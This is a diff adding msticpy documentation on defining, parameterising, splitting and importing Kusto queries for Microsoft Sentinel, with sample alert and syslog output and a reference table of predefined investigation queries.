+        SecurityAlert
+        | take 5
+        '''
+
+    query_test = qry_prov.exec_query(query=test_query)
+    query_test.head()
+
+===================  =================================================  ==========  =================================================  ================================================  ==========================================  ==============
+TimeGenerated        AlertDisplayName                                   Severity    Description                                        ExtendedProperties                                Entities                                    SourceSystem
+===================  =================================================  ==========  =================================================  ================================================  ==========================================  ==============
+2019-07-26 06:03:16  Traffic from unrecommended IP addresses was de...  Low         Azure security center has detected incoming tr...  {\r\n "Destination Port": "22",\r\n "Protoco...   [\r\n {\r\n "$id": "4",\r\n "ResourceId...  Detection
+2019-07-23 06:42:01  Traffic from unrecommended IP addresses was de...  Low         Azure security center has detected incoming tr...  {\r\n "Destination Port": "3389",\r\n "Proto...   [\r\n {\r\n "$id": "4",\r\n "ResourceId...  Detection
+2019-07-22 06:35:13  Suspicious authentication activity                 Medium      Although none of them succeeded, some of them ...  {\r\n "Activity start time (UTC)": "2019/07/2...  [\r\n {\r\n "$id": "4",\r\n "HostName":...  Detection
+2019-07-22 06:35:13  Suspicious authentication activity                 Medium      Although none of them succeeded, some of them ...  {\r\n "Activity start time (UTC)": "2019/07/2...  [\r\n {\r\n "$id": "4",\r\n "HostName":...  Detection
+2019-07-22 07:02:42  Traffic from unrecommended IP addresses was de...  Low         Azure security center has detected incoming tr...  {\r\n "Destination Port": "3389",\r\n "Proto...   [\r\n {\r\n "$id": "4",\r\n "ResourceId...  Detection
+===================  =================================================  ==========  =================================================  ================================================  ==========================================  ==============
+
+
+Splitting Query Execution into Chunks
+-------------------------------------
+
+Some queries return too much data or take too long to execute in a
+single request. The MSTICPy data providers have an option to
+split a query into time ranges. Each sub-range is run as an independent
+query and the results are combined before being returned as a
+DataFrame.
+
+To use this feature you must specify the keyword parameter ``split_queries_by``
+when executing the query function. The value to this parameter is a
+string that specifies a time period. The time range specified by the
+``start`` and ``end`` parameters to the query is split into sub-ranges
+each of which are the length of the split time period. For example, if you
+specify ``split_queries_by="1H"`` the query will be split into one hour
+chunks.
+
+.. note:: The final chunk may cover a time period larger or smaller
+   than the split period that you specified in the *split_queries_by*
+   parameter. This can happen if *start* and *end* are not aligned
+   exactly on time boundaries (e.g. if you used a one hour split period
+   and *end* is 10 hours 15 min after *start*. The query split logic
+   will create a larger final slice if *end* is close to the final time
+   range or it will insert an extra time range to ensure that the full
+   *start** to *end* time range is covered.
+
+The sub-ranges are used to generate a query for each time range. The
+queries are then executed in sequence and the results concatenated into
+a single DataFrame before being returned.
+
+The values acceptable for the *split_queries_by* parameter have the format:
+
+::
+
+    {N}{TimeUnit}
+
+where N is the number of units and TimeUnit is a mnemonic of the unit, e.g.
+H = hour, D = day, etc. For the full list of these see the documentation
+for Timedelta in the
+`pandas documentation <https://pandas.pydata.org/pandas-docs>`__
+
+.. warning:: There are some important caveats to this feature.
+
+   1. It currently only works with pre-defined queries (including ones
+      that you may create and add yourself, see `Creating new queries`_
+      below). It does not work with `Running an ad hoc query`_
+   2. If the query contains joins, the joins will only happen within
+      the time ranges of each subquery.
+   3. It only supports queries that have *start* and *end* parameters.
+   4. Very large queries may return results that can exhaust the memory
+      on the Python client machine.
+   5. Duplicate records are possible at the time boundaries. The code
+      tries to avoid returning duplicate records occurring
+      exactly on the time boundaries but some data sources may not use
+      granular enough time stamps to avoid this.
+
+Creating new queries
+--------------------
+
+*msticpy* provides a number of
+pre-defined queries to call with using the data package. You can also
+add in additional queries to be imported and used by your Query
+Provider, these are defined in YAML format files and examples of these
+files can be found at the msticpy GitHub site
+https://github.com/microsoft/msticpy/tree/master/msticpy/data/queries.
+
+The required structure of these query definition files is as follows.
+
+At the top level the file has the following keys:
+- **metadata**
+- **defaults**
+- **sources**
+
+These are described in the following sections.
+
+The metadata section
+~~~~~~~~~~~~~~~~~~~~
+
+- **version**: The version number of the definition file
+- **description**: A description of the purpose of this collection of query
+  definitions
+- **data_environments** []: A list of the Data Environments that
+  the defined queries can be run against (1 or more)
+- **data_families** []: A list of Data Families the defined queries related
+  to, these families are defined as part of msticpy.data.query_defns but
+  you can add custom ones.
+- **tags** []: A list of tags to help manage definition files (this is not
+  currently used
+
+
+The defaults section
+~~~~~~~~~~~~~~~~~~~~
+
+A set of defaults that apply to all queries in the file. You
+can use this section to define parameters that are common to all
+of the queries in the file. Child keys of the ``defaults`` section
+are inherited by the query definitions in the file.
+
+- **metadata**: Metadata regarding a query
+  - **data_source**: The data source to be used for the query
+- **parameters**: parameter defaults for the queries (the format of
+  the parameters section is the same as described in
+  the sources section.
+
+
+The sources section
+~~~~~~~~~~~~~~~~~~~
+
+Each key in the sources section defines a new query. The name of
+the key is the query name and must be unique and a valid Python identifier.
+Each query key has the following structure:
+
+- **description**: this is used to display help text for the query.
+- **metadata**: (optional) - if you want to override the global metadata
+  for this query
+- **args**: The primary item here is the query text.
+
+  - **query**: usually a multi-line string that will be passed to the
+    data provider. The string is usually parameterized, the parameters
+    being denoted by surrounding them with single braces ({}). If
+    you need to include literal braces in the query, type two braces.
+    For example::
+    "this {{literal_string}}" ->> "this {literal_string}"
+    Surround your query string with single quotes.
+  - **uri**: this is currently not used.
+- **parameters**: The parameters section defines the name, data type and
+  optional default value for each parameter that will be substituted into
+  the query before being passed to the data provider. Each parameter
+  must have a unique name (for each query, not globally). All parameters
+  specified in the query text must have an entry here or in the file
+  defauls section. The parameter subsection has the following sub-keys:
+
+  - **description**: A description of what the parameter is (used for generating
+    documentation strings.
+  - **type**: The data type of the parameter. Valid types include: "str", "int",
+    "float", "list" and "datetime". The list and datetime types cause additional
+    formatting to be applied (such as converting from a datestring)
+  - **default**: (optional) the default value for that parameter. Any parameter
+    that does not have a default value (here or in the file defaults section)
+    must be supplied at query time.
+
+Some common parameters used in the queries are:
+
+- **table**: making this a substitutable parameter allows you to use the same
+  query with different data sets. More commonly, you can add additional
+  filtering statements here, for example:
+
+.. code:: yaml
+
+    table:
+        description: The table name
+        type: str
+        default: SecurityEvent | where EventID == 4624
+
+- **add_query_items**: This is a useful way of extending queries by adding
+  ad hoc statements to the end of the query (e.g. additional filtering order
+  summarization).
+
+Using yaml aliases and macros in your queries
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can use standard yaml aliasing to define substitutable strings in your
+query definitions. E.g. you might have a parameter default that is a long
+string expression. Define an alias in the ``aliases`` key of the file
+metadata section. An alias is defined by prefixing the name with "&".
+The alias is referenced (and inserted) by using the alias name prefixed
+with "*"
+
+.. code:: yaml
+
+    metadata:
+        ...
+        aliases:
+            - &azure_network_project '| project TenantId, TimeGenerated,
+                FlowStartTime = FlowStartTime_t,
+                FlowEndTime = FlowEndTime_t,
+                FlowIntervalEndTime = FlowIntervalEndTime_t,
+                FlowType = FlowType_s,
+                ResourceGroup = split(VM_s, "/")[0],
+                VMName = split(VM_s, "/")[1],
+                VMIPAddress = VMIP_s'
+        ...
+    sources:
+        list_azure_network_flows_by_host:
+            description: Retrieves Azure network analytics flow events.
+            ...
+            parameters:
+                ...
+                query_project:
+                    description: Column project statement
+                    type: str
+                    default: *azure_network_project
+
+
+You can also use *macros*, which work like parameters but are substituted
+into the query before any parameter substitution is carried out. This
+allows you to, for example, use a single base query but with different
+filter and summarization clauses defined as macros. The macro text is
+substituted into the main query.
+
+Macros are added to the ``query_macros`` subkey of a query. They have
+two subkeys: description and value. value defines the text to be inserted.
+The key name is the name of the macro.
+
+In the query, you denote the substitution point by surrounding the macro name
+with "$<" and ">$". This is show in the example below.
+
+.. code:: yaml
+
+    - query: '
+        {table}
+        | where SubType_s == "FlowLog"
+        | where FlowStartTime_t >= datetime({start})
+        | where FlowEndTime_t <= datetime({end})
+        $<query_condition>$
+        | where (AllowedOutFlows_d > 0 or AllowedInFlows_d > 0)
+        {query_project}
+        | extend AllExtIPs = iif(isempty(PublicIPs), pack_array(ExtIP),
+                         iif(isempty(ExtIP), PublicIPs, array_concat(PublicIPs, pack_array(ExtIP)))
+                         )
+        | project-away ExtIP
+        | mvexpand AllExtIPs
+        {add_query_items}'
+
+Macros are particularly useful when combined with yaml aliases. You can, for
+example, define a base query (using a yaml alias) with a macro reference in the
+query body. Then in each query definition you can have different macro values
+for the macro to be substituted. For example:
+
+.. code:: yaml
+
+    metadata:
+        ...
+        aliases:
+            - &azure_network_base_query '
+                {table}
+                | where SubType_s == "FlowLog"
+                | where FlowStartTime_t >= datetime({start})
+                | where FlowEndTime_t <= datetime({end})
+                $<query_condition>$
+                | where (AllowedOutFlows_d > 0 or AllowedInFlows_d > 0)
+                {query_project}
+                | extend AllExtIPs = iif(isempty(PublicIPs), pack_array(ExtIP),
+                                iif(isempty(ExtIP), PublicIPs, array_concat(PublicIPs, pack_array(ExtIP)))
+                                )
+                | project-away ExtIP
+                | mvexpand AllExtIPs
+                {add_query_items}'
+        ...
+    sources:
+        list_azure_network_flows_by_ip:
+            description: Retrieves Azure network analytics flow events.
+        args:
+            query: *azure_network_base_query
+        parameters:
+            query_project:
+                ...
+            end:
+                description: Query end time
+                type: datetime
+        query_macros:
+            query_condition:
+                description: Query-specific where clause
+                value: '| where (VMIP_s in ({ip_address_list})
+                or SrcIP_s in ({ip_address_list})
+                or DestIP_s in ({ip_address_list})
+                )'
+
+This allows you define a series of related queries that have the
+same basic logic but have different filter clauses. This is extremely useful
+where the query is complex and allows you to keep a single copy.
+
+.. note:: Using aliases and macros complicates the logic for anyone
+    trying to read the query file, so use this sparingly.
+
+
+Guidelines for creating and debugging queries
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+It is often helpful to start with a working version of a query without
+using any parameters. Just paste in a query that you know is working. Once
+you have verified that this works and returns data as expected you can
+start to parameterize it.
+
+As you add parameters you can expect to find escaping and quoting
+issues with the parameter values. To see what the parameterized version
+of the query (without submitting it to the data provider) run the query
+with the first parameter "print". This will return the parameterized version
+of the query as a string:
+
+.. code:: ipython3
+
+    qry_prov.SecurityEvents.my_new_query(
+        "print",
+        start=start_dt,
+        end=end_dt,
+        account="ian",
+    )
+
+
+There are also a number of tools within the package to assist in
+validating new query definition files once created.
+
+::
+
+   data_query_reader.find_yaml_files
+
+       Return iterable of yaml files found in `source_path`.
+
+       Parameters
+       ----------
+       source_path : str
+           The source path to search in.
+       recursive : bool, optional
+           Whether to recurse through subfolders.
+           By default False
+
+       Returns
+       -------
+       Iterable[str]
+           File paths of yaml files found.
+
+    data_query_reader.validate_query_defs
+
+        Validate content of query definition.
+
+       Parameters
+       ----------
+       query_def_dict : dict
+           Dictionary of query definition yaml file contents.
+
+       Returns
+       -------
+       bool
+           True if validation succeeds.
+
+       Raises
+       ------
+       ValueError
+           The validation failure reason is returned in the
+           exception message (arg[0])
+
+validate_query_defs() does not perform comprehensive checks on the file
+but does check key elements required in the file are present.
+
+.. code:: ipython3
+
+    for file in QueryReader.find_yaml_files(source_path="C:\\queries"):
+        with open(file) as f_handle:
+            yaml_file = yaml.safe_load(f_handle)
+            if QueryReader.validate_query_defs(query_def_dict = yaml_file) == True:
+                print(f' {file} is a valid query definition')
+            else:
+                print(f'There is an error with {file}')
+
+
+.. parsed-literal::
+
+     C:\queries\example.yaml is a valid query definition
+
+
+Adding a new set of queries and running them
+--------------------------------------------
+
+Once you are happy with
+a query definition file then you import it with
+
+    *query_provider*.import_query_file(query_file= *path_to_query_file*)
+
+This will load the query file into the Query Provider’s Query Store from
+where it can be called.
+
+.. code:: ipython3
+
+    qry_prov.import_query_file(query_file='C:\\queries\\example.yaml')
+
+Once imported the queries in the files appear in the Query Provider’s
+Query Store alongside the others and can be called in the same manner as
+pre-defined queries.
+
+If you have created a large number of query definition files and you
+want to have the automatically imported into a Query Provider’s query
+store at initialization you can specify a directory containing these
+queries in the msticpyconfig.yaml file under QueryDefinitions: Custom:
+
+For example if I have a folder at C:\\queries I will set the
+config file to:
+
+.. code:: yaml
+
+    QueryDefinitions:
+        Custom:
+            - C:\queries
+
+
+Having the Custom field populated will mean the Query Provider will
+automatically enumerate all the YAML files in the directory provided and
+automatically import he relevant queries into the query store at
+initialization alongside the default queries. Custom queries with the
+same name as default queries will overwrite default queries.
+
+.. code:: ipython3
+
+    queries = qry_prov.list_queries()
+    for query in queries:
+        print(query)
+
+
+.. parsed-literal::
+
+    LinuxSyslog.all_syslog
+    LinuxSyslog.cron_activity
+    LinuxSyslog.squid_activity
+    LinuxSyslog.sudo_activity
+    LinuxSyslog.syslog_example
+    LinuxSyslog.user_group_activity
+    LinuxSyslog.user_logon
+    SecurityAlert.get_alert
+    SecurityAlert.list_alerts
+    SecurityAlert.list_alerts_counts
+    SecurityAlert.list_alerts_for_ip
+    SecurityAlert.list_related_alerts
+    WindowsSecurity.get_host_logon
+    WindowsSecurity.get_parent_process
+    WindowsSecurity.get_process_tree
+    WindowsSecurity.list_host_logon_failures
+    WindowsSecurity.list_host_logons
+    WindowsSecurity.list_host_processes
+    WindowsSecurity.list_hosts_matching_commandline
+    WindowsSecurity.list_matching_processes
+    WindowsSecurity.list_processes_in_session
+
+
+.. code:: ipython3
+
+    qry_prov.LinuxSyslog.syslog_example('?')
+
+
+.. parsed-literal::
+
+    Query:  syslog_example
+    Data source:  LogAnalytics
+    Example query
+
+    Parameters
+    ----------
+    add_query_items: str (optional)
+        Additional query clauses
+    end: datetime
+        Query end time
+    host_name: str
+        Hostname to query for
+    query_project: str (optional)
+        Column project statement
+        (default value is:  | project TenantId, Computer, Facility, TimeGener...)
+    start: datetime
+        Query start time
+    subscription_filter: str (optional)
+        Optional subscription/tenant filter expression
+        (default value is: true)
+    table: str (optional)
+        Table name
+        (default value is: Syslog)
+    Query:
+     {table} | where {subscription_filter}
+     | where TimeGenerated >= datetime({start})
+     | where TimeGenerated <= datetime({end})
+     | where Computer == "{host_name}" | take 5
+
+
+.. code:: ipython3
+
+    qry_prov.LinuxSyslog.syslog_example(
+        start='2019-07-21 23:43:18.274492',
+        end='2019-07-27 23:43:18.274492',
+        host_name='UbuntuDevEnv'
+    )
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>TenantId</th>
+          <th>SourceSystem</th>
+          <th>TimeGenerated</th>
+          <th>Computer</th>
+          <th>EventTime</th>
+          <th>Facility</th>
+          <th>HostName</th>
+          <th>SeverityLevel</th>
+          <th>SyslogMessage</th>
+          <th>ProcessID</th>
+          <th>HostIP</th>
+          <th>ProcessName</th>
+          <th>MG</th>
+          <th>Type</th>
+          <th>_ResourceId</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>
+          <td>Linux</td>
+          <td>2019-07-25 15:15:37.213</td>
+          <td>UbuntuDevEnv</td>
+          <td>2019-07-25 15:15:37</td>
+          <td>authpriv</td>
+          <td>UbuntuDevEnv</td>
+          <td>notice</td>
+          <td>omsagent : TTY=unknown   PWD=/opt/microsoft/om...</td>
+          <td>NaN</td>
+          <td>10.0.1.4</td>
+          <td>sudo</td>
+          <td>00000000-0000-0000-0000-000000000002</td>
+          <td>Syslog</td>
+          <td>/subscriptions/3b701f84-d04b-4479-89b1-fa8827e...</td>
+        </tr>
+        <tr>
+          <th>1</th>
+          <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>
+          <td>Linux</td>
+          <td>2019-07-25 15:15:37.313</td>
+          <td>UbuntuDevEnv</td>
+          <td>2019-07-25 15:15:37</td>
+          <td>authpriv</td>
+          <td>UbuntuDevEnv</td>
+          <td>info</td>
+          <td>pam_unix(sudo:session): session opened for use...</td>
+          <td>NaN</td>
+          <td>10.0.1.4</td>
+          <td>sudo</td>
+          <td>00000000-0000-0000-0000-000000000002</td>
+          <td>Syslog</td>
+          <td>/subscriptions/3b701f84-d04b-4479-89b1-fa8827e...</td>
+        </tr>
+        <tr>
+          <th>2</th>
+          <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>
+          <td>Linux</td>
+          <td>2019-07-25 15:15:37.917</td>
+          <td>UbuntuDevEnv</td>
+          <td>2019-07-25 15:15:37</td>
+          <td>authpriv</td>
+          <td>UbuntuDevEnv</td>
+          <td>info</td>
+          <td>pam_unix(sudo:session): session closed for use...</td>
+          <td>NaN</td>
+          <td>10.0.1.4</td>
+          <td>sudo</td>
+          <td>00000000-0000-0000-0000-000000000002</td>
+          <td>Syslog</td>
+          <td>/subscriptions/3b701f84-d04b-4479-89b1-fa8827e...</td>
+        </tr>
+        <tr>
+          <th>3</th>
+          <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>
+          <td>Linux</td>
+          <td>2019-07-25 15:15:50.793</td>
+          <td>UbuntuDevEnv</td>
+          <td>2019-07-25 15:15:50</td>
+          <td>authpriv</td>
+          <td>UbuntuDevEnv</td>
+          <td>info</td>
+          <td>pam_unix(cron:session): session closed for use...</td>
+          <td>29486.0</td>
+          <td>10.0.1.4</td>
+          <td>CRON</td>
+          <td>00000000-0000-0000-0000-000000000002</td>
+          <td>Syslog</td>
+          <td>/subscriptions/3b701f84-d04b-4479-89b1-fa8827e...</td>
+        </tr>
+        <tr>
+          <th>4</th>
+          <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>
+          <td>Linux</td>
+          <td>2019-07-25 15:16:01.800</td>
+          <td>UbuntuDevEnv</td>
+          <td>2019-07-25 15:16:01</td>
+          <td>authpriv</td>
+          <td>UbuntuDevEnv</td>
+          <td>info</td>
+          <td>pam_unix(cron:session): session opened for use...</td>
+          <td>29844.0</td>
+          <td>10.0.1.4</td>
+          <td>CRON</td>
+          <td>00000000-0000-0000-0000-000000000002</td>
+          <td>Syslog</td>
+          <td>/subscriptions/3b701f84-d04b-4479-89b1-fa8827e...</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+|
+
+If you are having difficulties with a defined query and it is not
+producing the expected results it can be useful to see the raw query
+exactly as it is passed to the Data Environment. If you call a query
+with ‘print’ and the parameters required by that query it will construct
+and print out the query string to be run.
+
+.. code:: ipython3
+
+    qry_prov.LinuxSyslog.syslog_example(
+        'print',
+        start='2019-07-21 23:43:18.274492',
+        end='2019-07-27 23:43:18.274492',
+        host_name='UbuntuDevEnv'
+    )
+
+
+
+
+.. parsed-literal::
+
+    'Syslog
+        | where true
+        | where TimeGenerated >= datetime(2019-07-21 23:43:18.274492)
+        | where TimeGenerated <= datetime(2019-07-27 23:43:18.274492)
+        | where Computer == "UbuntuDevEnv"
+        | take 5'
+
+
diff --git a/docs/source/data_acquisition/DataQueries.rst b/docs/source/data_acquisition/DataQueries.rst
new file mode 100644
index 000000000..7c69066af
--- /dev/null
+++ b/docs/source/data_acquisition/DataQueries.rst
@@ -0,0 +1,251 @@
+Data Queries Reference
+======================
+
+
+Queries for Microsoft Sentinel
+------------------------------
+
+Data Environment identifier: MSSentinel
+
+==================  ================================  ===========================================================================================================  ===============================================================================================================  ===========================
+QueryGroup          Query                             Description                                                                                                  Req-Params                                                                                                       Table
+==================  ================================  ===========================================================================================================  ===============================================================================================================  ===========================
+Azure               get_vmcomputer_for_host           Gets latest VMComputer record for Host                                                                       end (datetime), host_name (str), start (datetime)                                                                VMComputer
+Azure               get_vmcomputer_for_ip             Gets latest VMComputer record for IPAddress                                                                  end (datetime), ip_address (str), start (datetime)                                                               VMComputer
+Azure               list_aad_signins_for_account      Lists Azure AD Signins for Account                                                                           account_name (str), end (datetime), start (datetime)                                                             SigninLogs
+Azure               list_aad_signins_for_ip           Lists Azure AD Signins for an IP Address                                                                     end (datetime), ip_address_list (list), start (datetime)                                                         SigninLogs
+Azure               list_all_signins_geo              Gets Signin data used by morph charts                                                                        end (datetime), start (datetime)                                                                                 SigninLogs
+Azure               list_azure_activity_for_account   Lists Azure Activity for Account                                                                             account_name (str), end (datetime), start (datetime)                                                             AzureActivity
+Azure               list_azure_activity_for_ip        Lists Azure Activity for Caller IP Address(es)                                                               end (datetime), ip_address_list (list), start (datetime)                                                         AzureActivity
+Azure               list_azure_activity_for_resource  Lists Azure Activity for a Resource                                                                          end (datetime), resource_id (str), start (datetime)                                                              AzureActivity
+Azure               list_storage_ops_for_hash         no description                                                                                               end (datetime), file_hash (str), start (datetime)                                                                StorageFileLogs
+Azure               list_storage_ops_for_ip           no description                                                                                               end (datetime), ip_address (str), start (datetime)                                                               StorageFileLogs
+AzureNetwork        az_net_analytics                  All Azure Network Analytics Data                                                                             end (datetime), start (datetime)                                                                                 AzureNetworkAnalytics_CL
+AzureNetwork        dns_lookups_for_domain            Dns queries for a domain                                                                                     domain (str), end (datetime), start (datetime)                                                                   DnsEvents
+AzureNetwork        dns_lookups_for_ip                Dns queries for a domain                                                                                     end (datetime), ip_address (str), start (datetime)                                                               DnsEvents
+AzureNetwork        dns_lookups_from_ip               Dns queries for a domain                                                                                     end (datetime), ip_address (str), start (datetime)                                                               DnsEvents
+AzureNetwork        get_heartbeat_for_host            Retrieves latest OMS Heartbeat event for host.                                                               host_name (str)                                                                                                  Heartbeat
+AzureNetwork        get_heartbeat_for_ip              Retrieves latest OMS Heartbeat event for ip address.                                                         ip_address (str)                                                                                                 Heartbeat
+AzureNetwork        get_host_for_ip                   Gets the latest AzureNetworkAnalytics interface event for a host.                                            ip_address (str)                                                                                                 AzureNetworkAnalytics_CL
+AzureNetwork        get_ips_for_host                  Gets the latest AzureNetworkAnalytics interface event for a host.                                            host_name (str)                                                                                                  AzureNetworkAnalytics_CL
+AzureNetwork        list_azure_network_flows_by_host  Retrieves Azure network analytics flow events.                                                               end (datetime), host_name (str), start (datetime)                                                                AzureNetworkAnalytics_CL
+AzureNetwork        list_azure_network_flows_by_ip    Retrieves Azure network analytics flow events.                                                               end (datetime), ip_address_list (list), start (datetime)                                                         AzureNetworkAnalytics_CL
+AzureSentinel       get_bookmark_by_id                Retrieves a single Bookmark by BookmarkId                                                                    bookmark_id (str), end (datetime), start (datetime)                                                              HuntingBookmark
+AzureSentinel       get_bookmark_by_name              Retrieves one or more Bookmarks by Bookmark Name                                                             bookmark_name (str), end (datetime), start (datetime)                                                            HuntingBookmark
+AzureSentinel       list_bookmarks                    Retrieves list of bookmarks                                                                                  end (datetime), start (datetime)                                                                                 HuntingBookmark
+AzureSentinel       list_bookmarks_for_entity         Retrieves bookmarks for entity string                                                                        end (datetime), start (datetime)                                                                                 HuntingBookmark
+AzureSentinel       list_bookmarks_for_tags           Retrieves Bookmark by one or mare Tags                                                                       bookmark_tags (list), end (datetime), start (datetime)                                                           HuntingBookmark
+Heartbeat           get_heartbeat_for_host            Retrieves latest OMS Heartbeat event for host.                                                               host_name (str)                                                                                                  Heartbeat
+Heartbeat           get_heartbeat_for_ip              Retrieves latest OMS Heartbeat event for ip address.                                                         ip_address (str)                                                                                                 Heartbeat
+Heartbeat           get_info_by_hostname              Deprecated - use 'get_heartbeat_for_host'                                                                    end (datetime), host_name (str), start (datetime)                                                                Heartbeat
+Heartbeat           get_info_by_ipaddress             Deprecated - use 'get_heartbeat_for_ip'                                                                      end (datetime), ip_address (str), start (datetime)                                                               Heartbeat
+LinuxAudit          auditd_all                        Extract all audit messages grouped by mssg_id                                                                end (datetime), start (datetime)                                                                                 AuditLog_CL
+LinuxSyslog         all_syslog                        Returns all syslog activity for a host                                                                       end (datetime), start (datetime)                                                                                 Syslog
+LinuxSyslog         cron_activity                     All cron activity                                                                                            end (datetime), start (datetime)                                                                                 Syslog
+LinuxSyslog         list_account_logon_failures       All failed user logon events from an IP address                                                              account_name (str), end (datetime), start (datetime)                                                             Syslog
+LinuxSyslog         list_host_logon_failures          All failed user logon events on a host                                                                       end (datetime), host_name (str), start (datetime)                                                                Syslog
+LinuxSyslog         list_ip_logon_failures            All failed user logon events from an IP address                                                              end (datetime), ip_address (str), start (datetime)                                                               Syslog
+LinuxSyslog         list_logon_failures               All failed user logon events on any host                                                                     end (datetime), start (datetime)                                                                                 Syslog
+LinuxSyslog         list_logons_for_account           All successful user logon events for account (all hosts)                                                     account_name (str), end (datetime), start (datetime)                                                             Syslog
+LinuxSyslog         list_logons_for_host              All logon events on a host                                                                                   end (datetime), host_name (str), start (datetime)                                                                Syslog
+LinuxSyslog         list_logons_for_source_ip         All successful user logon events for source IP (all hosts)                                                   end (datetime), ip_address (str), start (datetime)                                                               Syslog
+LinuxSyslog         squid_activity                    All squid proxy activity                                                                                     end (datetime), host_name (str), start (datetime)                                                                Syslog
+LinuxSyslog         sudo_activity                     All sudo activity                                                                                            end (datetime), start (datetime)                                                                                 Syslog
+LinuxSyslog         user_group_activity               All user/group additions, deletions, and modifications                                                       end (datetime), start (datetime)                                                                                 Syslog
+LinuxSyslog         user_logon                        All user logon events on a host                                                                              end (datetime), host_name (str), start (datetime)                                                                Syslog
+MultiDataSource     get_timeseries_anomalies          Time Series filtered anomalies detected using built-in KQL time series function-series_decompose_anomalies   end (datetime), start (datetime), table (str)                                                                    na
+MultiDataSource     get_timeseries_data               Retrieves TimeSeriesData prepared to use with built-in KQL time series functions                             end (datetime), start (datetime), table (str)                                                                    na
+MultiDataSource     get_timeseries_decompose          Time Series decomposition and anomalies generated using built-in KQL time series function- series_decompose  end (datetime), start (datetime), table (str)                                                                    na
+MultiDataSource     plot_timeseries_datawithbaseline  Plot timeseries data using built-in KQL time series decomposition using built-in KQL render method           end (datetime), start (datetime), table (str)                                                                    na
+MultiDataSource     plot_timeseries_scoreanomolies    Plot timeseries anomaly score using built-in KQL render method                                               end (datetime), start (datetime), table (str)                                                                    na
+Network             get_heartbeat_for_host            Retrieves latest OMS Heartbeat event for host.                                                               host_name (str)                                                                                                  Heartbeat
+Network             get_heartbeat_for_ip              Retrieves latest OMS Heartbeat event for ip address.                                                         ip_address (str)                                                                                                 Heartbeat
+Network             get_host_for_ip                   Gets the latest AzureNetworkAnalytics interface event for a host.                                            ip_address (str)                                                                                                 AzureNetworkAnalytics_CL
+Network             get_ips_for_host                  Gets the latest AzureNetworkAnalytics interface event for a host.                                            host_name (str)                                                                                                  AzureNetworkAnalytics_CL
+Network             list_azure_network_flows_by_host  Retrieves Azure network analytics flow events.                                                               end (datetime), host_name (str), start (datetime)                                                                AzureNetworkAnalytics_CL
+Network             list_azure_network_flows_by_ip    Retrieves Azure network analytics flow events.                                                               end (datetime), ip_address_list (list), start (datetime)                                                         AzureNetworkAnalytics_CL
+Office365           list_activity_for_account         Lists Office Activity for Account                                                                            account_name (str), end (datetime), start (datetime)                                                             OfficeActivity
+Office365           list_activity_for_ip              Lists Office Activity for Caller IP Address(es)                                                              end (datetime), ip_address_list (list), start (datetime)                                                         OfficeActivity
+Office365           list_activity_for_resource        Lists Office Activity for a Resource                                                                         end (datetime), resource_id (str), start (datetime)                                                              OfficeActivity
+SecurityAlert       get_alert                         Retrieves a single alert by SystemAlertId                                                                    system_alert_id (str)                                                                                            SecurityAlert
+SecurityAlert       list_alerts                       Retrieves list of alerts                                                                                     end (datetime), start (datetime)                                                                                 SecurityAlert
+SecurityAlert       list_alerts_counts                Retrieves summary count of alerts by type                                                                    end (datetime), start (datetime)                                                                                 SecurityAlert
+SecurityAlert       list_alerts_for_ip                Retrieves list of alerts with a common IP Address                                                            end (datetime), source_ip_list (str), start (datetime)                                                           SecurityAlert
+SecurityAlert       list_related_alerts               Retrieves list of alerts with a common host, account or process                                              end (datetime), start (datetime)                                                                                 SecurityAlert
+ThreatIntelligence  list_indicators                   Retrieves list of all current indicators.                                                                    end (datetime), start (datetime)                                                                                 ThreatIntelligenceIndicator
+ThreatIntelligence  list_indicators_by_domain         Retrieves list of indicators by domain                                                                       domain_list (list), end (datetime), start (datetime)                                                             ThreatIntelligenceIndicator
+ThreatIntelligence  list_indicators_by_email          Retrieves list of indicators by email address                                                                end (datetime), observables (list), start (datetime)                                                             ThreatIntelligenceIndicator
+ThreatIntelligence  list_indicators_by_filepath       Retrieves list of indicators by file path                                                                    end (datetime), observables (list), start (datetime)                                                             ThreatIntelligenceIndicator
+ThreatIntelligence  list_indicators_by_hash           Retrieves list of indicators by file hash                                                                    end (datetime), file_hash_list (list), start (datetime)                                                          ThreatIntelligenceIndicator
+ThreatIntelligence  list_indicators_by_ip             Retrieves list of indicators by IP Address                                                                   end (datetime), ip_address_list (list), start (datetime)                                                         ThreatIntelligenceIndicator
+ThreatIntelligence  list_indicators_by_url            Retrieves list of indicators by URL                                                                          end (datetime), start (datetime), url_list (list)                                                                ThreatIntelligenceIndicator
+WindowsSecurity     get_host_logon                    Retrieves the logon event for the session id on the host                                                     end (datetime), host_name (str), logon_session_id (str), start (datetime)                                        SecurityEvent
+WindowsSecurity     get_parent_process                Retrieves the parent process of a supplied process                                                           end (datetime), host_name (str), logon_session_id (str), process_id (str), process_name (str), start (datetime)  SecurityEvent
+WindowsSecurity     get_process_tree                  Retrieves the process tree of a supplied process                                                             end (datetime), host_name (str), logon_session_id (str), process_id (str), process_name (str), start (datetime)  SecurityEvent
+WindowsSecurity     list_all_logons_by_host           account all failed or successful logons to a host                                                            end (datetime), host_name (str), start (datetime)                                                                SecurityEvent
+WindowsSecurity     list_events                       Retrieves list of all events                                                                                 end (datetime), start (datetime)                                                                                 SecurityEvent
+WindowsSecurity     list_events_by_id                 Retrieves list of events on a host                                                                           end (datetime), event_list (list), start (datetime)                                                              SecurityEvent
+WindowsSecurity     list_host_events                  Retrieves list of all events on a host                                                                       end (datetime), host_name (str), start (datetime)                                                                SecurityEvent
+WindowsSecurity     list_host_events_by_id            Retrieves list of events on a host                                                                           end (datetime), host_name (str), start (datetime)                                                                SecurityEvent
